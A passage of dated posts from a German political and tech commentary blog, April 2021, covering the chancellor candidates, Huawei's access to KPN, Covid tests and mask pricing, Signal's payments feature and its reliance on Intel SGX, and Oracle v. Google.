Die haben auch eine Strategie, um Suchmaschinen zu bereinigen: Sie klonen den anderen Content deiner Site in ihrem Fake-Netzwerk. Dann sorgen sie dafür, dass Google und co das sehen, und damit bist du als Spammer unter fernerliefen in den Suchergebnissen.
Inzwischen hat Qurium auch einen zweiten Blogeintrag zu dem Zensurladen gemacht.

Wed Apr 21 2021

[l] Irgendwie hab ich gerade den Eindruck, der Laschet wollte gar nicht Kanzler werden. Der wollte nur Söder verhindern.
Und Söder wollte auch nicht Kanzler werden. Der wollte nur zeigen, dass jemand aus Bayern es hätte werden können.
Der Scholz will auch nicht Kanzler werden. Die SPD musste halt jemanden aufstellen und er war als einziger noch im Raum, als das Licht wieder anging.
Die Baerbock will glaube ich auch nicht Kanzler werden. Die hat noch gar nicht darüber nachgedacht, was das bedeuten würde für sie und ihr Leben. Das ist ein Scheißjob, den sollte niemand haben wollen, der halbwegs bei Bewusstsein ist.
Die Baerbock will nicht Kanzler werden, glaube ich, die wollte bloß Kanzlerkandidatin werden. Das war der natürliche nächste Schritt auf der Wir-sind-ja-so-progressiv-Bullshitskala innerhalb der Grünen. Wo es, wir erinnern uns, so Glanzlichter des Sexismus wie diesen Vorschlag hier gab. Die Grünen betreiben da eh einen circle jerk, denen geht es um gegenseitiges Bekräftigen des Weltbildes und kreisförmiges auf die Schulter klopfen für die angenommene eigene Leistung, von der man außerhalb der Partei nur irgendwie nie irgendwas zu Gesicht kriegt.
Schnell, nennt mal ein paar grüne Politikpunkte, die der Kretschmann gemacht hat!
Die Baerbock hat glaube ich noch nicht begriffen, dass Kanzler ein Job außerhalb der Partei ist. Dass da Leute Ansprüche an das Amt mit verbinden und von ihr Dinge erwarten würden. Bisher hat ja niemand was von ihr erwartet. Es reichte, dass sie eine Frau war.
Habt ihr heute mal die Zeitungen aufgemacht? Baerbock, Baerbock, Baerbock. Die Stimmung bei Laschets Presseshow muss ja erdrückend gewesen sein. Da hat der gerade mit geschickten unfairen prozeduralen Tricks den Söder rausgekantet, und schon am nächsten Tag redet keine Sau mehr über ihn. LOL

Tue Apr 20 2021

[l] Ich finde es ja bemerkenswert, dass es eine Partei wie die Grünen wagt, einen Kanzlerkandidaten aufzustellen.
Die haben immerhin schonmal den Vizekanzler gestellt, und was hat der gemacht? Einen illegalen Angriffskrieg gegen Jugoslawien geführt. Danach ist er Pipeline-Manager geworden.
Oh und er war auch maßgeblich an der Agenda 2010 beteiligt, die Entkernung des Sozialstaates in Deutschland.
Dass so eine Partei nicht nur weitermacht sondern jetzt auch noch einen Kanzlerkandidaten stellt, das lässt tief blicken.
Wie die katholische Kirche! Die hat auch einfach weitergemacht! Inquisition? Hexenverbrennung? Kindesmissbrauch? Egal! Augen zu und weiter!
Und wen stellen sie da auf? Eine Talkshow-Touristin, die bisher ausschließlich durch Hohlphrasen, Empörung und Wokeness aufgefallen ist.
Oder fällt von euch jemandem was ein, was die mal geleistet hätte?
Übersehe ich was oder ist die nicht nur die personifizierte Frauenförderung sondern bestätigt direkt auch noch alle Vorurteile.
Aber kommt, fragt sie nach ihren Kindern. Das ist das relevante Kriterium für Kanzler. Mutter sein ist nämlich der härteste Job der Welt, müsst ihr wissen.
Update: Mir ist noch was eingefallen, wofür die Grünen stehen. Für Atomenergie (sie waren gegen den Merkel-Atomausstieg), für Abholzung (Danneröder Forst), für Stuttgart-21. Für Trojaner in euren Telefonen. Gegen Geschwindigkeitslimits auf Autobahnen. Für weitere illegale Kriege ohne Bundestagsmandat. Für Covid-Behandlung mit Zitronen und Knoblauch. So ein suchbares Blogarchiv ist ja schon manchmal ganz hilfreich.
[l] Aus den Niederlanden kam gerade neue Anti-Huawei-Berichterstattung rein. Der Originalartikel ist auf niederländisch und hinter einer Paywall, daher hier bloß Link auf eine Twitter-Zusammenfassung.
Grundsätzlich: Die haben da offenbar einen "Service"-Deal mit Huawei gemacht, bei dem Huawei sich als Admin auf ihren Geräten einloggen kann.
Wenn du deine gesamte Infrastruktur von Huawei kaufst, heißt das halt, dass sie alle Telefonate sehen und vielleicht gar mitschneiden können, die Stammdaten abgreifen, und sogar sehen konnten, welche Nummern gerade von der Polizei überwacht wurden.
Hier ist das "Dementi" von KPN.
Das ist ein so schwaches Dementi, das wäre sogar der CDU peinlich gewesen, das zu veröffentlichen.
Vorwurf: Die können bei euch alles machen und ihr würdet nichts mitkriegen.
"Dementi": Wir haben tatsächlich nichts mitgekriegt.
Was dementiert denn das bitte?! Nichts dementiert das!
Das ist ja an sich schon Popcorn-Kino vom Feinsten, aber darf ich bei der Gelegenheit bitte mal darauf hinweisen, dass sämtliche deutschen Telcos auch alle entweder schon in die Cloud umgezogen sind oder mit Nachdruck daran arbeiten? Telefonica ist vorgeprescht. Die anderen sind angezählt. Was dachtet ihr denn, was das heißt? Dass ausländische Dienste über Admin-Schnittstellen Daten abgreifen und manipulieren können heißt das, und die "Betreiber" merken nichts davon.
Ich freu mich schon auf das "Dementi" von Telefonica, man habe nichts gemerkt.

Mon Apr 19 2021

[l] Habt ihr euch auch solche Sorgen gemacht wegen der Hirnvenenthrombosen von den Covid-Impfstoffen?
In solchen Fällen hilft am besten, wenn man sich die Zahlen mal in aller Ruhe anguckt, am besten mit einem guten Vergleichsrahmen. Die Uni Oxford hat das mal für uns gemacht.
Ergebnis (in Thrombose-Inzidenzen pro 1 Million Menschen):
- 5 bei Astrazeneca
- 4 bei Pfizer oder Moderna
- 39 bei einer richtigen Covid-Infektion
Zum Vergleich: Im RKI-Jahrbuch 2019 gibt es 74 Erkrankungen von Campylobacter-Enteritis pro 100.000 Einwohner, d.h. 740 pro Million.

Fri Apr 16 2021

[l] Erinnert ihr euch noch an die 6€ für Schutzmasken, bis zu der die Bundesregierung erstatten wollte? Wo sich die Apotheker eine goldene Nase verdient haben? Die 6€, ja?
Da stand ja schon so ein bisschen die Frage im Raum, wo die eigentlich herkamen, die 6€.
Hier hat mal jemand den Staat gefragt.
Das Ergebnis ist in dem PDF-Anhang dort zu lesen.
Das Bundesgesundheitsministerium war nicht selbst in der Lage, den Marktpreis für Schutzmasken herauszufinden. Also haben sie EY mit einer Beratungsdienstleistung beauftragt.
Hier ist, was dann passierte:
Der Erstattungspreis von 6 Euro je Maske einschließlich Umsatzsteuer geht wesentlich zurück auf einer Erhebung des Beratungsunternehmens "EY". Dieses hat in einer für das BMG durchgeführten Studie zu den Preisentwicklungen in den unterschiedlichen Maskenklassen zum Stichtag 9. Oktober 2020 einen Durchschnittspreis von 4,29 Euro erhoben. Als Quelle für die Preisinformationen wurde von "EY" das Preisvergleichsportel "Idealo" herangezogen, das vorrangig die Angebote reiner Internet-Anbieter umfasst.
Beachtet den strategischen Einsatz des Passiv hier. Das wurde gemacht. Nicht wir haben das gemacht. Nein, nein. Das wurde gemacht. Von, äh, ... *aufdieuhrguck* ich muss weg!
Hingegen sollen die von der Bundesregierung finanzierten Masken über die Apotheken abgegeben werden. Damit sind deren Beschaffungskosten, die Kosten für die Beratungsleisdtung gegenüber den Anspruchberechtigten und die Kosten für den Abrechnungsweg über die Apothekenrechenzentren zu berücksichtigen.
Äh ... ok? Also Industrieförderung sagt ihr, ja?
Zudem ist zu berücksichtigen, dass von dem Erstattungsbetrag ein Anreiz für die Apothekerinnen und Apotheker ausgehen sollte, sich an der mit zusätzlichem Aufwand verbundenen Abgabe der Schutzmasken zu beteiligen.
Ach? Reicht es nicht, dass ihr denen Kunden ins Haus spült? Und dass sie das als Bulkware billiger einkaufen können? Wart ihr mal in einer Apotheke? Was die einem da alles gleich mit aufschwatzen wollen oder gar ungefragt an Pröbchen mit in den Beutel stecken? Das reichte alles nicht?!
Tja, jetzt würde ich ja nur noch gerne wissen, wieviel das BMG EY dafür gezahlt hat, dass sie einmal den Webbrowser aufmachen und eine Webseite aufrufen. (Danke, Georg)
[l] Industrielle Landwirtschaft hat u.a. den Nachteil, dass es Monokulturen statt Pflanzenmix gibt, was dann zu Bodenerosion führt.
In den USA haben sie das jetzt mal mit Satelliten erforscht und das Ergebnis sieht nicht gut aus:
The Nation’s Corn Belt Has Lost a Third of Its Topsoil
Hach naja, die Amis, denkt ihr euch jetzt vielleicht, bei uns wird das schon ordentlich gemacht werden. Nope, genau dieselbe Scheiße passiert bei uns.

Wed Apr 14 2021

[l] Erinnert ihr euch noch an den Amthor?
Wegen was für Anfängerliga-Lappalien in Sachen Korruption sie den geschasst haben?
Im Vergleich zum Rest der Verbrecherpartei lief der da rückblickend aber noch deutlich unter dem Median!
Ich persönlich mache mir im Moment ja Sorgen, dass sie uns noch einen Surprise-Altmaier reindrücken als Kanzler.
Wisst ihr noch, wie wir uns damals über die Republikaner in den USA lustig gemacht haben? Die hatten 8 Kandidaten, und alle waren offensichtlich völlig ungeeignet. Haha, haben wir gelacht, was für Deppen! Dass die überhaupt antreten! Und dann gewann der Trump.
In dem Kontext müsst ihr bei uns die CDU betrachten! Welches ist der populistische Außenseiter, der überraschend an allen vorbeiziehen wird?
Schon irgendwie doof an der Stelle, dass das alles populistische Außenseiter sind bei denen.
Update: Ah, da hatte ich eine Entwicklung übersehen. Leserbrief:
Amthor wurde nicht etwa geschasst sondern ist gar zum Spitzenkandidaten der CDU in Mecklenburg-Vorpommern aufgestiegen. Ich denke die Symbolik ergibt sich da von selbst.
OK gut, dann passt ja wieder alles wie Arsch auf Eimer.

Thu Apr 8 2021

[l] Haha, jetzt kommen hier die ganzen zynischen Leserbriefe rein.
Einer schrieb mir, die Regierung sähe sich halt als Krisenmanager, nicht als Problemlöser. Das Ziel eines Krisenmanagers ist nicht, die Krise zu beenden, sondern dafür zu sorgen, dass der Laden möglichst in voller Kapazität weiterläuft, während man die Krise aussitzt.
Ein anderer schreibt, ich würde den Plan der Regierung missverstehen. Deren Ziel sei die Durchseuchung der Bevölkerung. Kurzfristig sei die Politik daran interessiert, die Leichenberge klein zu halten. Daher werden jetzt die Alten geimpft, und den Jungen macht man mit Astrazeneca-Geraune das Impfen madig.
Der einzige virologische Berater von Laschet ist nach wie vor der Durchseuchungs-Streeck.
Auch die Impfung soll an der Durchseuchung nichts wesentliches ändern, d.h. die Impfung ist nicht das Ziel, sondern nur Mittel, die Durchseuchung akzeptabel zu machen. Geimpft werden sollen offenbar nur Risikopatienten, die die Durchseuchung nicht aushalten werden, und deshalb quengeln. Deshalb glaubt die Regierung auch, bis Juni jedem Impfwilligen ein Angebot machen zu können — ja ne, wir haben da längst nicht genügend Dosen für alle. Der Rest wird halt mit Meldungen über AstraZeneca (von dem wir am meisten bestellt haben) impfunwillig gemacht. Und deshalb glaubt Laschet auch, dass das nur noch ein paar Wochen dauert, bis alle geimpft sind, die eine Impfung brauchen. Die restlichen 60 Millionen? Durchseuchen!
Dass die Durchseuchung zwangsläufig dann zu Flucht-Mutationen führt, die alle Programme vergebens machen — glaubst du, das hat Laschet auf dem Radar? Merkel vielleicht, aber die ist erkennbar sehr, sehr müde. Wäre ich jetzt auch, wenn die Partei mir Laschet als Nachfolger präsentiert.
Bei einer richtigen schnellen ZeroCovid-Strategie ist der Lockdown in der Tat die Maßnahme, weil er schneller geht als alles andere, und man keinen komplizierten Test auf medizinische Wirksamkeit braucht: das ist ein nicht-pharmazeutischer Eingriff, der geht auch so. Hinterher (bei zeitigem Lockdown nur wenige Wochen) kommt dann noch Einreisequarantäne und Testen zum Entdecken von neuen Clustern. Und dann kann man auch gemütlich impfen, um die nervigen Einreisequarantänen und Kurz-Lockdowns zu beenden, und muss dafür vor allem Reisende impfen.
Diese Variante hielt unsere Regierung nie für möglich, auch nicht die Experten, die sie im März 2020 für die Begründung eines Lockdowns gefragt haben, den sie vorher auch nicht für möglich hielten.
Ich weiß inzwischen auch ungefähr, warum: Die Experten haben im März/April 2020 ausgerechnet, dass die D614G-Mutation, die nach damaligem Stand wohl Ende Januar über Webasto eingereist ist, innerhalb von ca. 6 Wochen 5 Millionen Infektionen erzeugt hat, während in Wuhan mit der „Wildform“ innerhalb von 9 Wochen etwa 200k Infektionen entstanden. Entsprechend ansteckender hat man diese Mutation eingeordnet. Und damit braucht man heftigere Maßnahmen als die in Wuhan. Und das geht ja wohl nicht.
Das Paper hat sehr lange durch den Review gebraucht, und im Preprint habe ich diesen Schrott bislang ignoriert:
https://elifesciences.org/articles/65365
Man sieht da schön, wie die G614-Variante plötzlich massiv auftaucht in den Sequenzen, und ganz schnell das Infektionsgeschehen übernimmt. Dass die deshalb massiv auftaucht, weil man die von ihr befallenen Gebiete vorher überhaupt nicht angeguckt hat, und entsprechend auch nichts sequenziert hat — und gleichzeitig im D614-Gebiet die Eindämmung erfolgreich war… tja. Das wäre ja seriöse Wissenschaft.
Das war natürlich ein Irrtum, was der Erfolg der relativ milden Lockdowns in Europa schnell gezeigt hat. Das Virus war schon länger in Europa (wissen wir inzwischen auch zuverlässig), und hat deshalb viel mehr Zeit für den Anlauf gehabt, und die Webasto-Chinesin hat sich dann halt wohl hier angesteckt. Aber da müsste man dann das Narrativ vom China-Virus aufgeben (wenn es gleichzeitig in Wuhan und Mailand in verschiedenen Varianten auftauchte, dann war keines davon die Quelle), und das geht natürlich auch nicht. Also kann man diese Fehleinschätzung nicht korrigieren.
Wenn du einmal als Geisterfahrer auf der Autobahn bist, kriegst du das nicht legal korrigiert: Wenden ist ja verboten. Und genau so verhalten sich unsere Geisterfahrer in der Politik.
[l] Ein Leser schickt mir gerade diese NDR-Meldung aus Niedersachsen. Money Quote:
Die Region Hannover "habe zudem nicht ansatzweise nachvollziehbar aufgezeigt, dass und in welchem Umfang sie bisher Bemühungen unternommen habe, die behauptete unzureichende Einhaltung der Kontaktbeschränkungen durch staatliche Kontrolle und staatliches Eingreifen zu verbessern", heißt es in einer schriftlichen Mitteilung des OVG.
Außerdem könne die Region nicht ausreichend darlegen, in welchem Umfang die angeführten regelwidrigen nächtlichen Zusammenkünfte im privaten Raum tatsächlich stattfänden.
Deshalb hat das OVG die von der Landesregierung verhängte Ausgangssperre kurzerhand aufgehoben.
Ich musste sofort an John Oliver über Plastik und Recycling denken. Lacher am Rande: Er blendet da in einer Reihe von Plastik-Produkten auch einen Dildo ein, deshalb hat Youtube das Video hinter der Jugendschutzwall weggesperrt. In dem Video erklärt John Oliver ein paar unangenehme Wahrheiten. Erst geht es um die in den USA auf den Plastikverpackungen aufgedruckten Recycling-Logos. Die haben eine Zahl zwischen 1 und 7 drin. 7 ist "sonstiges". Die einzigen beiden davon, die recycled werden können, sind 1 und 2. Ein wirtschaftliches Recycling von Plastik ist nur in ein paar unsignifikanten Randbereichen überhaupt möglich, und das war von vorneherein klar. Er hatte da eine Statistik über Nestle, dass bei denen nur so um die 20% der Flaschen aus dem Recycling von alten Flaschen kommt. Und Nestle ist damit Marktführer, bei Coca Cola sind es eher so 10%. Was es mit dem angeblichen Recycling-Plastik mehr gibt ist: Verbrennen (das ist ja auch bei uns das schmutzige Geheimnis hinter "Wertstoffsammlung"), Downcycling in sowas wie eine Parkbank oder Fleece-Kleidung, aber aus denen kannst du dann nicht wieder Flaschen machen. Von Kreislauf kann keine Rede sein.
Warum assoziierte ich das bei der Hannover-Meldung? Weil John Oliver zeigt, dass die ganze Recycling-Sache eine PR-Aktion von Coca Cola und co ist. Die haben eine fette Kampagne gemacht, um den Leuten einzureden, es sei deren Verantwortung, den Plastikmüll zu recyclen, den sie verursachen.
Wartet, geht noch weiter mit meiner Assoziationskette.
Die Idee des CO2 Footprint kommt von BP. Um euch einzureden, es sei euer CO2-Footprint, nicht ihrer.
Und jetzt in der Covid-Politik haben wir dasselbe wieder. Die Regierung verkackt das Impfprogramm nach Strich und Faden und lässt uns seit einem Jahr am Bullshit-Lockdown-Arm verhungern. Hier kamen schon Verschwörungstheorien rein, dass die auf keinen Fall wollten, dass die Krise zur Bundestagswahl schon vorbei ist, weil die Leute in der Krise immer die alte Regierung nochmal wählen. Soweit würde ich jetzt nicht gehen, aber das Muster ist doch auffällig. Die Verursacher der Probleme schieben uns die Verantwortung für ihr Verkacken in die Schuhe. Das muss man erstmal schaffen, noch ekeliger als die katholische Kirche zu werden. Die hat uns einfach nur Schuld eingeredet, nicht Schuld für etwas, das sie verursacht hatte. Gut, da kann man jetzt vielleicht auch diskutieren, inwieweit die katholische Kirche mit ihren Dogmen die Armen arm gehalten hat. Egal, es ging hier nicht um die katholische Kirche.
Ich frage mich gerade, was das OLG gerne als Beweis hätte, dass die Leute abends rausgehen und sich anstecken. Illegal gerasterfahndete Handybewegungsprofile? Nicht dass ich eine Ausgangssperre toll finde, schon gar nicht eine nur nachts. Halten die das Virus für nachtaktiv oder wie?
Update: Oh gibt noch ein schönes Beispiel: Facebook. Die schieben ja auch die Schuld den Anwendern zu. Die hätte ja ihre Einstellungen zunageln können!1!!

Wed Apr 7 2021

[l] Ein Kumpel erzählte mir gerade, dass in der Schule seines Kindes alle Schüler Selbsttests gemacht haben und kein Kind positiv war.
Das klingt ja erstmal gut. Aber wartet mal. Waren die Selbsttests nicht fehlerbehaftet?
Sagen wir mal, die Schule hat 1000 Schüler. Und so ein Selbsttest hat eine Fehlerrate von 2%. Dann würde man intuitiv erwarten, dass 20 Schüler positiv testen, obwohl sie gesund sind.
Wenn du einen Knopf drückst, und der hat 2% Fehlerrate, hast du eine Wahrscheinlichkeit (Wahrscheinlichkeiten sind zwischen 0 und 1) von 0.98, keinen Fehler zu sehen.
Wenn du zweimal drückst, hast du eine Wahrscheinlichkeit von 0.98 * 0.98.
Wenn du 100 Mal drückst, hast du eine Wahrscheinlichkeit von 0.98 ¹⁰⁰ (13%), keinen Fehler zu sehen.
Ihr ahnt schon, worauf ich hinaus will. Wenn du 1000 Mal drückst, ist es 0.98 ¹⁰⁰⁰ oder 1.68e-9 oder 0.00000000168 oder 0.000000168%.
Wenn das bei einer Wahl auftreten würde, würde man das vermutlich als Beweis für Wahlbetrug durchgehen lassen.
Nagelt mich nicht auf der 2% Fehlerrate fest. Der Punkt war nicht der konkrete Wert, sondern wie ihr das ausrechnen könnt und wie schnell da verschwindend geringe Wahrscheinlichkeiten übrig bleiben am Ende.
Wenn sowas also auftaucht, wie sollte ich darauf reagieren?
Naja, es gibt mehrere offensichtliche Erklärungen:
1. Die Tests sind VIEL besser als vom Hersteller versprochen
2. Die Tests sind Placebos, um die Bevölkerung ruhig zu stellen
3. Die Tests werden falsch angewendet
4. Die Schulen unterschlagen False Positives in ihren Statistiken, um die Bevölkerung nicht zu beunruhigen.
Ich persönlich würde mal spekulieren, dass die Tests einfach falsch angewendet werden. Wenn man das die Schüler selbst machen lässt, wäre das ja auch eher überraschend, wenn die wüssten, wie man das richtig macht.
Worauf ich hinaus will: Dieses Herumgeteste ist wahrscheinlich Bullshit. Ich bleibe bei meiner Ansage von vorgestern.
Update: Ich hab jetzt vereinfacht. Es gibt bei den Tests zwei Fehlerarten, False Positive (Test sagt infiziert wenn nicht infiziert) und False Negative (Test sagt gesund wenn infiziert). Beide sind natürlich scheiße. Und 2% Fehlerrate ist echt wenig. Das RKI hat selbst für Antigen-Schnelltests relativ ernüchternde Wahrscheinlichkeitsrechnungen publiziert, sehe ich gerade. Und da sehen wir schon gleich das nächste Problem. Die Fehlerrate der Tests hängt nämlich davon ab, wie hoch der Anteil der tatsächlich Infizierten im Sample ist. Daher geben Hersteller da nicht die Fehlerrate an, sondern die Sensitivität und die Spezifität.
Die Sensitität gibt an, mit welcher Wahrscheinlichkeit eine Erkrankung vom Test erkannt wird. Die Spezifität gibt an, mit welcher Wahrscheinlichkeit Gesunde vom Test korrekt erkannt werden.
Man will beides möglichst bei 100% haben. Und jetzt gucken wir doch mal, was die aktuellen Anforderungen an Antigentests sind: Sensitivität mindestens 80%. Das ist schockierend schlecht. Bis zu eine von fünf Erkrankungen würde bei so einer krassen Fehlerrate nicht erkannt. Bei der Spezifität ist die Anforderung mindestens 97%. Warum fordern die so viel mehr Spezifität als Sensitivität? Weil sie annehmen, dass die meisten Menschen gesund sind. Wenn 5% der Bevölkerung krank sind, und du 100 Leute testest, hast du 5 Kranke und 95 Gesunde. Wenn der Test jetzt eine Sensitivität von 80% hat, hast du wahrscheinlich wenn es hoch kommt einen Kranken fälschlich als gesund getestet. Bei einer Spezifität von 80% hättest du aber 19 Personen fälschlich als krank gemeldet, die eigentlich gesund sind.
Update: Hier ist eine Kleine Anfrage aus Hamburg, wo sie eine Schule mit 1500 Schülern haben, wo aber alle Tests negativ waren.
Update: Hey, wisst ihr was? Fragen wir doch einfach mal den Staat!
Diese zeigt, dass Antigen-Schnelltests bei Menschen mit Symptomen besser geeignet sind, Fälle von COVID-19 korrekt zu identifizieren als bei symptomlosen Personen. Bei Personen mit Symptomen wurden im Durchschnitt 72 % der Personen, die COVID-19 hatten, korrekt als infiziert identifiziert. Bei Personen ohne Symptome identifizierten die Antigentests dagegen im Durchschnitt nur 58 % der Infizierten richtig.
Au weia.
Update: Das betrifft natürlich nicht nur Schulen sondern auch Konzerte und Veranstaltungen.
Update: Offenbar ist die Güte der Tests in der Praxis deutlich besser als die Mindestanforderungen. Ein Leser schickt zwei Links dazu: ZDF und Angaben eines China-Herstellers von Sensitivität 96% und Spezifität 99%. Allerdings auf einem Sample von bloß 108 Leuten.
Update: Hier berichtet jemand von einem Beispiel für Variante 3.
Wollt ihr mal wissen, wie so ein Schnelltest in der Schule bei K1 abläuft?
Die Kids betupfen sanft die Nasenspitze von innen („Nicht tiefer rein!“), dann wird das Stäbchen kurz in die Testflüssigkeit getunkt und auf den Test geträufelt. Der wird anschließend sofort von von einem Schüler oder einer Schülerin eingesammelt und - von der Lehrerin ungesehen - in den Müll geworfen. Die Lehrerin notiert: Alle negativ.
Meine Tochter war die Einzige, die sich anschließend weigerte ihre FFP2-Maske im Unterricht - sind ja alle negativ - abzunehmen.
Man kann gar nicht früh genug anfangen, Kindern beizubringen, dass sie von Bullshit-Künstlern umgeben sind. Kann man gar nicht früh genug im Leben lernen.
[l] Oh Graus. Signal baut jetzt Payment ein.
Das ist ja schonmal grundsätzlich eine ganz schlechte Idee, weil es Signal zu einem Ziel für Scammer macht. Im Moment ist es nur ein Ziel für Geheimdienste. Schlimm genug.
Aber Signal baut nicht nur Payments ein. Nein, nein! Signal baut Blockchain ein.
Das ist der letzte Sargnagel. Ich habe schon aufgehört, Signal zu empfehlen, seit sie dieses desaströse Pin-Update eingebaut haben. Inhaltlich hat das bedeutet, dass sie dein Telefonbuch in die Cloud hochladen. War nicht so klar kommuniziert, aber das war das. Sie machen eine Packung Bullshit-Voodoo über deine Pin, dann verschlüsseln sie damit dein Telefonbuch, und dann laden sie es in die Cloud hoch.
Weil Smartphones sich überhaupt nicht für die Eingabe von Text oder Passwörtern eignen, ist die Pin entweder unbrauchbar, weil man sie nicht eingegeben kriegt, oder sie ist unbrauchbar, weil sie zu wenig Entropie hat und auf dem Server einfach durchprobiert werden könnte.
Und Signal hat diese verkackte Pin nicht Opt-In gemacht sondern einmal allen aufgezwungen. Das war der Moment, seit dem ich Signal nicht mehr benutze.
Aber jetzt? Auch noch ein Blockchain-Bullshit-Sandwich draus machen?
Und nicht mal eine echte Blockchain sondern so ein Voodoo-Handwaving-Hybrid-Schlangenöl.
Ich habe mir das letztes Jahr mal näher angeguckt. Das gesamte Ding fußt auf Intel SGX. Das ist Intels Enklaven-Voodoo-Tech. Laut Signal funktioniert das so: Deren Krypto-Blockchain-Voodooware ist Open Source und du kannst sie selber bauen. Dann kannst du davon eine kryptografische Checksumme nehmen. Dann fragst du einen proprietären unprüfbaren closed-source Cloud-Dienst von Intel, und der sagt dir dann die Checksum von dem Kram in der SGX-Enklave. Dann kannst du sehen, dass die Software unmodifiziert war.
Woher weiß denn der proprietäre unprüfbare closed-source Voodoo-Dienst von Intel in der Cloud die Checksumme von der Software in der SGX-Enklave? Nun, der verlässt sich auf proprietäre unprüfbare closed-source Voodooware von Intel in deiner Intel-CPU (in der Management-Engine, die Intel allen Kunden unausschaltbar aufzwängt) mit SGX.
Ihr merkt schon: Lange hat mich nicht mehr ein Konzept so dermaßen wenig überzeugt. Die Anzahl der Schichten an "guck hier mal nicht so genau hin"-Level Krypto ist atemberaubend. Die Humanisten unter euch werden die Wortbedeutung von Krypto kennen und an der Stelle die Ironie genießen, dass Krypto-Voodoo hier als Flimflam-Zutat für ein Bullshit-Cocktail aus wilden Ablenkungs-Handbewegungen hergenommen wird, das man sonst nur von Hütchenspielern und Bühnenzauberern kennt.
Ach komm, Fefe, werdet ihr jetzt sagen. Intel ist doch vertrauenswürdig! Ach ja? Intel, wir erinnern uns, musste mehrere Milliarden Entschädigung an AMD blechen, weil sie sie mit unfairen Methoden zu behindern versucht haben. Intels Compiler erzeugte jahrelang (bis heute?) Binaries, die auf AMD-Prozessoren künstlich mit angezogener Handbremse liefen. Und DIE sollen jetzt die Grundlage für unser Vertrauen in Signal sein?!
Aber Fefe, sagt ihr jetzt vielleicht, Intel hat doch gar keinen Anreiz für Beschiss an der Stelle!!1! Ach ja, ist das so? Wir reden von einem fucking Payment-Dienst! Wer da bescheißen kann, kann sich anderer Leute Geld überweisen! Da seht ihr keinen Anreiz?!
Nee, sorry. Signal hat über die Jahre eine Menge Vertrauen aufgebaut. Das ist jetzt weg.
Oh, übrigens, erwähnte ich, dass deren "Open Source"-Serverkomponenten seit nem Jahr nicht mehr geupdated wurden? Und auf deren Servern andere Software läuft als was sie im open source-Repo veröffentlichen?
Ja, äh, klar stinkt das, aber komm, wir schmieren da jetzt ein paar Lagen Krypto-Blablah drüber und dann decken wir das mit einer Decke unvertrauenswürdigen Intel-Versprechungen zu. Hier, noch ein bisschen Pseudo-Open-Source-Parfüm drübergespritzt, dann riecht man das gar nicht mehr so!1!!
Ich habe ja neulich schon bei der Meldung zu den hopsgenommenen Krypto-Messengern angedeutet, dass in Zukunft die wichtigste Eigenschaft von Krypto-Messengern sein wird, ob sie auch dann noch vertrauenswürdig einsetzbar sind, wenn die Infrastruktur von schattigen Behörden oder Geheimdiensten oder Kriminellen übernommen wurde.
Alle Messenger, die dich nicht selber Key-Management über QR-Codes o.ä. machen lassen, sind direkt durchgefallen. Dazu gehört leider auch Signal.
Ich persönlich schiebe die Schuld an dieser ganzen Misere ja den Sprallos in die Schuhe, die seit Jahren PGP madig reden. PGP ist die einzige fucking Krypto-Software, die explizit mit dem Ziel entwickelt wurde, dass du nicht dem Netz, nicht der Cloud, nicht irgendwelcher von Dritten betriebenen Infrastruktur glauben musst, sondern zur Not alles zur Hand bootstrappen und betreiben kannst. Diese ganze Hipster-Kacke, die heute unter Krypto läuft, kannst du alles einmal in der Pfeife rauchen. Ja, auch Browser-Krypto. Oder hat jemand von euch schonmal manuell Zertifikats-Hashes im Browser verglichen? Und dann verstanden, dass nächstes Mal ein anderes Zertifikat kommen könnte und man das bei jeder HTTPS-Verbindung einzeln verifizieren müsste eigentlich?
Ja, kommt, ihr Apple-Hipster. Erzählt mir mehr darüber, wie man ordentliche Krypto macht. Aber aber aber Signal ist doch viel einfacher zu bedienen!!1! Ja, der bedient sich sogar ganz von selbst und lädt deine Daten in die Cloud hoch!
Apropos Signal. Lacher am Rande. Bei dem Facebook-Datenreichtum ist ja auch der Datensatz von Mark Zuckerberg drin gewesen. Jemand hat die Telefonnummer in sein Adressbuch eingetragen. Und wisst ihr, was als nächstes passierte? Signal hat ihm gesagt: Zuckerberg ist auf Signal! Connect with him! Wie, ach, das habt ihr gar nicht auf dem Schirm gehabt als mögliches Privatsphäreproblem?
Na sowas.
Sic transit gloria mundi.
Update: Oh, guck mal einer schau. Signal hat gestern abend den Open Source Serverteil aktualisiert. Ein Schelm, wer Böses dabei denkt!
Update: Bei Signal kann man übrigens Kontakte manuell verifizieren. Ja, sogar mit QR-Code. Weiß nur keine Sau, weil das so geschickt in der UI verborgen ist. Haben sie irgendwann nachgerüstet und keiner hat's gemerkt. Man geht in die Kontakte-Liste, dann öffnet man einen Gesprächsverlauf mit jemandem, dann geht man im Menü auf Conversation Settings, dann scrollt man runter, denn diese unwichtige Randgruppenoption ist die letzte in der Liste: View Safety Number. Wenn man da raufgeht, dann kommt ein Screen namens Verify Safety Number. Dann muss man nur noch ein paar Jungfrauen in einem Pentagramm opfern und lateinische Inkantationen sprechen.

Mon Apr 5 2021

[l] Seit zehn Jahren kloppen sich Oracle und Google vor Gericht.
Oracle hat ja Sun gekauft, und damit die Rechte an Java.
Google hat Android gekauft, das war ein kleines Startup, und die haben voll auf Java gesetzt, aber um Oracles Trademarks nicht zu verletzen und keine Lizenzgebühren zahlen zu müssen, haben sie nicht das Sun/Oracle-Java genommen sondern einmal die APIs nachprogrammiert.
Oracle hat dann vor Gericht gemeint, sie besäßen aber "geistiges Eigentum"-Rechte an den APIs und dafür müsse Google Lizenzgebühren zahlen.
Der Supreme Court hat jetzt Google recht gegeben.
Alles andere wäre auch echt furchtbar geworden. Dann könnte auch SCO Linux verklagen, oder Microsoft könnte WINE plätten. Emulatoren wären tot.
Insofern war das auf jeden Fall die richtige Entscheidung.
Allerdings hat das Gericht da (wie üblich) versucht, einer Grundsatzentscheidung aus dem Wege zu gehen, damit sie nicht nochmal einen Klopper wie Citizen United fabrizieren.
Und so haben sie nicht generell entschieden, dass APIs nicht unter Copyright fallen, was meines Erachtens die richtige Ansage gewesen wäre, sondern sie haben bloß entschieden, dass Google hier Fair Use gemacht hat, d.h. eine Ausnahme vom Copyright greift. Damit ist natürlich zukünftigen Verfahren Tür und Tor geöffnet, ab wann ein API-Nachbau nicht mehr unter Fair Use fällt. (Danke, Andreas)
[l] Ende letzten Jahres ging die Story um, dass der Trump eine Spendenseite für seine Wiederwahl aufgemacht hatte, die in Wahrheit eine Abofalle war und dann wöchentlich abbuchte, nicht nur einmalig.
Hier ist das Nachbeben dazu:
